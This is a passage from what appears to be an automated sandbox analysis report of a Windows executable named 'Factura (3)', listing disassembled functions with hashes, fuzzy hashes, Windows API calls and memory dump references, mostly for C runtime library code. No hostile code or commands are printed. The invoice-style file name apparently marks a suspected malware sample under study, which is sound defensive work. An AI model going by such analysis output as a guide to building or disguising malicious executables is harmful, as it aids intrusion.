                                                      • Instruction ID: 4279e209ac51e867f78bafa2fac682257e3f4539a4d50dc633ab3112a9e83fba
                                                      • Opcode Fuzzy Hash: 531ec001749944e30a9d6009bf9ae8df4748624afa1a8fb5c67025f4f1a1f96a
                                                      • Instruction Fuzzy Hash: 2581F822B0DA4665F26AAF36B4C037AE2D0BF95354F844371ED6F92594DF3CE481A610
                                                      Function 00007FF7340DB010 Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: char_traits$Concurrency::details::EmptyQueue::StructuredWork$Max_valueMin_value
                                                      • String ID:
                                                      • API String ID: 3432838598-0
                                                      • Opcode ID: 8b4ef932259451e5b47ea0ad590b63d43647a5924eedafdc8e7f0c9a60c10db8
                                                      • Instruction ID: 9e5ebffad2469333e02be7aed7c5bf1ec664391dd91aa610337a346b3785ae1c
                                                      • Opcode Fuzzy Hash: 8b4ef932259451e5b47ea0ad590b63d43647a5924eedafdc8e7f0c9a60c10db8
                                                      • Instruction Fuzzy Hash: 6C412A27A1CB8592CA24EB16F49026EE7A1FBC9784F500166FA8D43B6ACF3CD1449F50
                                                      Function 00007FF7341091E8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: _set_statfp
                                                      • String ID:
                                                      • API String ID: 1156100317-0
                                                      • Opcode ID: e65ba792651367d839098e214d5891407b2dde01c0b567b7a4e043ebbfca8b6f
                                                      • Instruction ID: ca2fbe6fa3d9fcaca09539c11593a0244fb553b56824af1451f162ccf6455cae
                                                      • Opcode Fuzzy Hash: e65ba792651367d839098e214d5891407b2dde01c0b567b7a4e043ebbfca8b6f
                                                      • Instruction Fuzzy Hash: 7611E666E6CE0321F75C3A16F4E9339A340AF58370FE44234EA7FE62D68E5C94417522
                                                      Function 00007FF7340F7F44 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • FlsGetValue.KERNEL32(?,?,?,00007FF7340EE03F,?,?,00000000,00007FF7340EE2DA,?,?,?,?,?,00007FF7340EE266), ref: 00007FF7340F7F63
                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7340EE03F,?,?,00000000,00007FF7340EE2DA,?,?,?,?,?,00007FF7340EE266), ref: 00007FF7340F7F82
                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7340EE03F,?,?,00000000,00007FF7340EE2DA,?,?,?,?,?,00007FF7340EE266), ref: 00007FF7340F7FAA
                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7340EE03F,?,?,00000000,00007FF7340EE2DA,?,?,?,?,?,00007FF7340EE266), ref: 00007FF7340F7FBB
                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7340EE03F,?,?,00000000,00007FF7340EE2DA,?,?,?,?,?,00007FF7340EE266), ref: 00007FF7340F7FCC
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: Value
                                                      • String ID:
                                                      • API String ID: 3702945584-0
                                                      • Opcode ID: d4de03ca6d5f8685dfd289fe5fbbe4e7d6bcd97dff717548317c0db56e8f5eeb
                                                      • Instruction ID: 56b33bfa65faa1f8a1750cc0dd54e2f6ba26894a4368a1d15b8ac372b572cec0
                                                      • Opcode Fuzzy Hash: d4de03ca6d5f8685dfd289fe5fbbe4e7d6bcd97dff717548317c0db56e8f5eeb
                                                      • Instruction Fuzzy Hash: 4D118E11B0A60262FA9C7B37A5D10B9E1C15F847B0EC843B4E82D877D5EE2CF4167621
                                                      Function 00007FF7340F7DD8 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: Value
                                                      • String ID:
                                                      • API String ID: 3702945584-0
                                                      • Opcode ID: c5989110b8010fe8408217dc186f18f61c7b563f3eb4e20ac6df03ad7ec94710
                                                      • Instruction ID: daa112161e54b888734a8b2bd2b379b93a1d17b9b13d03d9d374b53051561627
                                                      • Opcode Fuzzy Hash: c5989110b8010fe8408217dc186f18f61c7b563f3eb4e20ac6df03ad7ec94710
                                                      • Instruction Fuzzy Hash: AD113D11B0A60362F99CBA3354D10B9F1C10F4A770ED807B5D93E8A2D2EE2CB8166631
                                                      Function 00007FF7340FED24 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 212COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                      • API String ID: 3215553584-1196891531
                                                      • Opcode ID: 5eb145913d3343604472cfe0388461154ec951036e7515a65bacf91879f874e3
                                                      • Instruction ID: e990b1effd90c7c6b30daa97a72168707fe3d9f603eb894f6a3acdec60ebc553
                                                      • Opcode Fuzzy Hash: 5eb145913d3343604472cfe0388461154ec951036e7515a65bacf91879f874e3
                                                      • Instruction Fuzzy Hash: 1481D431F0E206A5F77D6E2B95C4238FBD0DF15748FE450B1C90DC6699CA2DA845B3A2
                                                      Function 00007FF7340EAEB4 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: CallEncodePointerTranslator
                                                      • String ID: MOC$RCC
                                                      • API String ID: 3544855599-2084237596
                                                      • Opcode ID: 6923b9501380832990e45b27c507c7c64dc35f75449c16bfab4da47b21d7df6c
                                                      • Instruction ID: 338e7f9a007734bbf513292fd41f81a4842b4b08e8c24d6d5b659dce018a6cc5
                                                      • Opcode Fuzzy Hash: 6923b9501380832990e45b27c507c7c64dc35f75449c16bfab4da47b21d7df6c
                                                      • Instruction Fuzzy Hash: 2091F473B08B859AE715DF66E4802ACBBB0FB44788F50416AEB8C57755CF38D1A5DB00
                                                      Function 00007FF7340E9544 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                      • String ID: csm
                                                      • API String ID: 2395640692-1018135373
                                                      • Opcode ID: 1a4949c0ea1086f68affbb26a41fdb3df8eed441f895190c80f5e2a87e27c6d4
                                                      • Instruction ID: 83cb08a3463cdb25486f7cde2179d372f9ad34b2d546f791aedab8b1aaebc034
                                                      • Opcode Fuzzy Hash: 1a4949c0ea1086f68affbb26a41fdb3df8eed441f895190c80f5e2a87e27c6d4
                                                      • Instruction Fuzzy Hash: 3151E531B19A05EADB18EF26E084A7CB395EB40B88F904171DACE83384DF7CE491DB14
                                                      Function 00007FF7340EAC44 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: CallEncodePointerTranslator
                                                      • String ID: MOC$RCC
                                                      • API String ID: 3544855599-2084237596
                                                      • Opcode ID: 2b300c59cc9fd1ea1e542b589aff1002b137ba27e66d08c623b88e9895aee7d6
                                                      • Instruction ID: 3e57d8623b9a3d9d462f878e38eb3438d15842a5520e7ebdcc7d366d988f9fc7
                                                      • Opcode Fuzzy Hash: 2b300c59cc9fd1ea1e542b589aff1002b137ba27e66d08c623b88e9895aee7d6
                                                      • Instruction Fuzzy Hash: E161A432A08B8995DB34AF16E4803AAF7A0FB88794F444265EB8C53B55DF7CD1E0CB14
                                                      Function 00007FF7340EB434 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                      • String ID: csm$csm
                                                      • API String ID: 3896166516-3733052814
                                                      • Opcode ID: 65d4a7bc1d0d0d895a1cf153372a4cfdb2e16185853312814b7f248943856b60
                                                      • Instruction ID: 5314d9846f84c66212d34a3bbc05e38708f954738156f3257b82d50616235946
                                                      • Opcode Fuzzy Hash: 65d4a7bc1d0d0d895a1cf153372a4cfdb2e16185853312814b7f248943856b60
                                                      • Instruction Fuzzy Hash: 3351B432A09A45D6DB68EF2391C4368B7A0FB44B88F544175DB9C87795CF3CE4A09B18
                                                      Function 00007FF7340E4990 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 137COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID: 0-3916222277
                                                      • Opcode ID: 5627846810b7840d04b29f13ab5916d6bf3e1d58606ed61d3c5a842b833f617e
                                                      • Instruction ID: e814ed138c4e4741f0010d6a452c6a58ce3580d4bf7008c3ce5be3ee9056d611
                                                      • Opcode Fuzzy Hash: 5627846810b7840d04b29f13ab5916d6bf3e1d58606ed61d3c5a842b833f617e
                                                      • Instruction Fuzzy Hash: 8171512260DA89D5E668AF56E4803BEF7A0EB80740F900175E68D87A95CF3CD494EF24
                                                      Function 00007FF7340F941C Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                      • String ID:
                                                      • API String ID: 2718003287-0
                                                      • Opcode ID: 777fbad731c06f54c77a9aea4c15951a02d3929d06ec450856ffd67d6e2cd436
                                                      • Instruction ID: 7c64187c897aca554f1bb7e236507e65aebe06641c8651cd3ab9bf81d640d6b6
                                                      • Opcode Fuzzy Hash: 777fbad731c06f54c77a9aea4c15951a02d3929d06ec450856ffd67d6e2cd436
                                                      • Instruction Fuzzy Hash: BCD12232B09B8199E714DF76D4C02ACB7B1FB44B98B804276CE9D97B89DE38D406DB50
                                                      Function 00007FF7340E3190 Relevance: 6.1, APIs: 4, Instructions: 132COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: Concurrency::details::EmptyQueue::StructuredWorkfrexplswprintf
                                                      • String ID:
                                                      • API String ID: 2911421839-0
                                                      • Opcode ID: 23b3957c33b713597f9c4863a235fa6b0b2778af4deacfe5bb9874e9912d05c4
                                                      • Instruction ID: 5558b2ac241f3ba61efd5e49e6f9363bd94082ad6fc43ff92ca88549d11932e8
                                                      • Opcode Fuzzy Hash: 23b3957c33b713597f9c4863a235fa6b0b2778af4deacfe5bb9874e9912d05c4
                                                      • Instruction Fuzzy Hash: 9A614E3260CAC595D665AB26F4903AEFB60EBC5380F900175E7CD83A9ADE3CD484DB50
                                                      Function 00007FF7340E0970 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: GetcvtLocinfo::_std::_$Concurrency::cancellation_token_source::~cancellation_token_sourceGetvals
                                                      • String ID:
                                                      • API String ID: 272587748-0
                                                      • Opcode ID: 8c68f46551777554ff82005fabf25d234fb373a92e91dc05e1b277fa42d2f5a0
                                                      • Instruction ID: ea027bfef254846c2b6d5b6e2ec94d6e6b536503f4602ce2d120f7e09f32f230
                                                      • Opcode Fuzzy Hash: 8c68f46551777554ff82005fabf25d234fb373a92e91dc05e1b277fa42d2f5a0
                                                      • Instruction Fuzzy Hash: 16414C32A08BC591DA24EB16E4903EEA3A0FBD8784F904076DACC87769DF7CC195DB50
                                                      Function 00007FF7340E83A4 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                      • String ID:
                                                      • API String ID: 2933794660-0
                                                      • Opcode ID: f1d6d1889c2798bb0420719893d6d1ca4d12ecf4e30f05c87899f262d9974fba
                                                      • Instruction ID: 17b427a07ce9d52b052d37f03669daae2bfd95d51cd2804c9776b3fb4f570b09
                                                      • Opcode Fuzzy Hash: f1d6d1889c2798bb0420719893d6d1ca4d12ecf4e30f05c87899f262d9974fba
                                                      • Instruction Fuzzy Hash: E0117026B54F0599EB04EF61F8842B873A4F718798F840E31DA6D837A8EF78D154C350
                                                      Function 00007FF7340EB66C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: __except_validate_context_record
                                                      • String ID: csm$csm
                                                      • API String ID: 1467352782-3733052814
                                                      • Opcode ID: 42d89c5ad33d7bd92d738027da93574dcf54f7694659ae518c3cc543189d5069
                                                      • Instruction ID: 0e556dbe837470f81d823fcb7d676bf806ea1e7cbb8ee93bfc6d160d53f4546d
                                                      • Opcode Fuzzy Hash: 42d89c5ad33d7bd92d738027da93574dcf54f7694659ae518c3cc543189d5069
                                                      • Instruction Fuzzy Hash: 1B710232B09A8596DB29AF26D0D067DBBB0FB40B84F448172DE8C87B85CB3CD4A1D714
                                                      Function 00007FF7340EBD04 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 117COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: CreateFrameInfo__except_validate_context_record
                                                      • String ID: csm
                                                      • API String ID: 2558813199-1018135373
                                                      • Opcode ID: 0f740e8bcad2f777fba0f68efa58b46ec1834093898652b2ce8256f8fb4a285d
                                                      • Instruction ID: 2e9f8e00c5774fb85b2d17c9f5058895d65afe4f89becd64768c7a19b1fc2eaa
                                                      • Opcode Fuzzy Hash: 0f740e8bcad2f777fba0f68efa58b46ec1834093898652b2ce8256f8fb4a285d
                                                      • Instruction Fuzzy Hash: 97515B36719B8696D624EF16E18026DB7A4FB88B90F400174EBCD87B56CF39D4A0DB14
                                                      Function 00007FF7340F9AB4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: ErrorFileLastWrite
                                                      • String ID: U
                                                      • API String ID: 442123175-4171548499
                                                      • Opcode ID: 443bb9a5d29fbdb7e161cc3baf9247f0ce557e4f934ffa7003bd4cb58d2d0713
                                                      • Instruction ID: 827156773aaf13108b71b6ac5f403400550b10a0ee5d424dd829d0c4bce67a53
                                                      • Opcode Fuzzy Hash: 443bb9a5d29fbdb7e161cc3baf9247f0ce557e4f934ffa7003bd4cb58d2d0713
                                                      • Instruction Fuzzy Hash: 6241B422B29A4591DB64EF26E4843A9A7A0FB88784F954031EE8DC7758DF3CD441DB50
                                                      Function 00007FF7340E8618 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7340E7ECF), ref: 00007FF7340E8668
                                                      • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7340E7ECF), ref: 00007FF7340E86A9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
